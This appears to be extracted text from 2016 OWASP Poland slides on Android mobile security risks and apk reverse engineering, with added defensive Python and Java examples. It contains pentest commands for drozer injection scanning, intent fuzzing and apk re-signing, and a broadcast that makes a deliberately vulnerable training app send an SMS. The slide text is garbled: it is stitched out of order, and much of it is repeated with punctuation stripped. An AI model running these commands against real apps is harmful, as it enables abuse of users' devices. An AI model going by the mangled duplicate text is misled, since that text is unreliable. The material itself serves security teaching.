A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute „exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that „sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
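The four mitigations above put together as one server-side session store, added here as a Python example rather than code from the workshop. It assumes a plain in-memory store and takes the current time as a parameter, so the "copy the cookie and try it after 30 minutes" check from the how-to-find slide can be reproduced without waiting; the IDLE_TIMEOUT and ABSOLUTE_LIFETIME values are illustrative.

```python
"""Server-side session handling following the M9 mitigation list.

Added example, not code from the workshop. Tokens come from the OS CSPRNG
via the secrets module and never from a device ID; every session is
tracked on the server and dies after an idle timeout chosen for the
application or after a hard absolute lifetime; and all of a user's tokens
are destroyed whenever that user's authentication state changes (new
login, logout, password change). Timeout values here are illustrative.
"""
import secrets
import time

IDLE_TIMEOUT = 30 * 60        # seconds without a request before the token dies
ABSOLUTE_LIFETIME = 8 * 3600  # hard cap, however active the session is


class SessionStore:
    def __init__(self, idle_timeout=IDLE_TIMEOUT, absolute_lifetime=ABSOLUTE_LIFETIME):
        self.idle_timeout = idle_timeout
        self.absolute_lifetime = absolute_lifetime
        # token -> {"user": str, "created": float, "last_seen": float}
        self._sessions = {}

    def create(self, user, now=None):
        """Log a user in: any token the user already holds is destroyed first."""
        now = time.time() if now is None else now
        self.invalidate_user(user)          # authentication state changed
        token = secrets.token_urlsafe(32)   # 256 random bits, unguessable, not device-derived
        self._sessions[token] = {"user": user, "created": now, "last_seen": now}
        return token

    def validate(self, token, now=None):
        """Return the user behind a live token, or None; dead tokens are removed."""
        now = time.time() if now is None else now
        sess = self._sessions.get(token)
        if sess is None:
            return None
        idle_for = now - sess["last_seen"]
        age = now - sess["created"]
        if idle_for > self.idle_timeout or age > self.absolute_lifetime:
            del self._sessions[token]       # unused or too old: destroyed server-side
            return None
        sess["last_seen"] = now
        return sess["user"]

    def invalidate(self, token):
        """Logout: destroy exactly this token on the server."""
        return self._sessions.pop(token, None) is not None

    def invalidate_user(self, user):
        """Destroy every session a user holds; returns how many were dropped."""
        stale = [t for t, s in self._sessions.items() if s["user"] == user]
        for t in stale:
            del self._sessions[t]
        return len(stale)

    def live_count(self):
        """Number of sessions currently held on the server."""
        return len(self._sessions)


if __name__ == "__main__":
    store = SessionStore()
    t0 = time.time()
    tok = store.create("alice", now=t0)
    print("10 min later:", store.validate(tok, now=t0 + 600))              # alice
    print("31 idle min later:", store.validate(tok, now=t0 + 600 + 1860))  # None
```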
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
– APKOptic
– Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:

    public void onReceive(Context arg0, Intent arg1) {
        context = arg0;
        SmsManager sms = SmsManager.getDefault();
        // extras of whatever broadcast arrives are used as-is: no check of sender, action or content
        Bundle bundle = arg1.getExtras();
        sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
        Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
    }

Broadcast receivers
Broadcast receivers attacks
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
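Applied to the SendSMSNowReceiver shown above, the two defenses look like this. This is an added example, not GoatDroid's code: the permission name, the ConfirmSmsActivity class and the manifest fragment in the comment are assumptions, and the extras validation is the part the original receiver was missing.

```java
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.os.Bundle;
import android.util.Log;

/**
 * Hardened receiver for the SOCIAL_SMS action (added example, not GoatDroid code).
 * Assumed manifest entries (hypothetical permission name):
 *
 *   <permission android:name="org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS"
 *               android:protectionLevel="signature" />
 *   <receiver android:name=".broadcastreceivers.SendSMSNowReceiver"
 *             android:exported="false"
 *             android:permission="org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS">
 *       <intent-filter>
 *           <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
 *       </intent-filter>
 *   </receiver>
 */
public class SendSMSNowReceiver extends BroadcastReceiver {
    static final String ACTION = "org.owasp.goatdroid.fourgoats.SOCIAL_SMS";
    static final String PERMISSION = "org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS"; // hypothetical
    private static final String TAG = "SendSMSNowReceiver";

    /** Runtime registration with the same signature-level permission as the manifest entry. */
    public static void register(Context ctx, SendSMSNowReceiver receiver) {
        ctx.registerReceiver(receiver, new IntentFilter(ACTION), PERMISSION, null);
    }

    @Override
    public void onReceive(Context context, Intent intent) {
        // Only the exact action we registered for; a filter match alone is not proof of intent.
        if (intent == null || !ACTION.equals(intent.getAction())) return;
        Bundle extras = intent.getExtras();
        if (extras == null) return;

        String number = extras.getString("phoneNumber");
        String message = extras.getString("message");
        // The original passed both straight to sendTextMessage(); validate first.
        if (!isValidNumber(number) || !isValidMessage(message)) {
            Log.w(TAG, "rejected SOCIAL_SMS broadcast with malformed extras");
            return;
        }
        // A receiver should not spend the user's money on another component's say-so:
        // hand over to an Activity (hypothetical) where the user confirms recipient and text.
        Intent confirm = new Intent(context, ConfirmSmsActivity.class)   // explicit intent
                .putExtra("phoneNumber", number)
                .putExtra("message", message)
                .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        context.startActivity(confirm);
    }

    /** Optional '+', 6 to 15 digits, nothing else. */
    static boolean isValidNumber(String n) {
        return n != null && n.matches("\\+?[0-9]{6,15}");
    }

    /** One SMS segment of printable text. */
    static boolean isValidMessage(String m) {
        return m != null && !m.isEmpty() && m.length() <= 160 && m.matches("[\\p{Print}\\s]+");
    }
}
```

With android:exported="false" the drozer command shown above no longer reaches the receiver at all; the signature permission covers the case where the receiver must stay reachable by the vendor's other apps, and the validation covers the case where one of those apps is itself compromised.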
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML data stores
– Plain text configuration files
– Cookie stores
– SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the SD card before and after installing the application
• Analyze the package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean "incorrectly"?
• Insecure implementations are:
– Using known weak ciphers or protocol versions (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
if (presented_cert == pinned_cert)
    Start_connection()
else
    Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
mallodroid.py -f AppToCheck.apk -d javaout
• Look for end point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable=false)
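The first two mitigations as app code, added here as an example (not from the slides): a log helper that is silent in release builds and redacts credential-looking fields before they can reach logcat or a crash log, and a hardening routine for a sensitive EditText that removes the copy/cut action mode. It assumes the app's generated BuildConfig class is on the classpath (it is for any Gradle-built app) and that android:debuggable is left at the release default of false in the manifest.

```java
import android.text.InputType;
import android.util.Log;
import android.view.ActionMode;
import android.view.Menu;
import android.view.MenuItem;
import android.widget.EditText;

/** Leak guards for logging and the clipboard (added example; BuildConfig is the app's generated class). */
public final class LeakGuards {
    private LeakGuards() {}

    /** Debug-only logging: in release builds nothing is written to logcat at all. */
    public static void d(String tag, String msg) {
        if (BuildConfig.DEBUG) Log.d(tag, redact(msg));
    }

    /** Always-on logging for errors, but never with raw credentials in the line. */
    public static void e(String tag, String msg, Throwable t) {
        Log.e(tag, redact(msg), t);
    }

    /** Mask values of fields that are typically secrets in URLs, headers or form bodies. */
    static String redact(String s) {
        if (s == null) return null;
        return s.replaceAll("(?i)(token|session|sessionid|password|authorization|api[_-]?key)=[^&\\s]+",
                            "$1=[REDACTED]");
    }

    /** Sensitive field: no copy/cut/share action mode, no keyboard suggestions, no long-press selection. */
    public static void hardenSensitiveField(EditText field) {
        field.setLongClickable(false);
        field.setTextIsSelectable(false);
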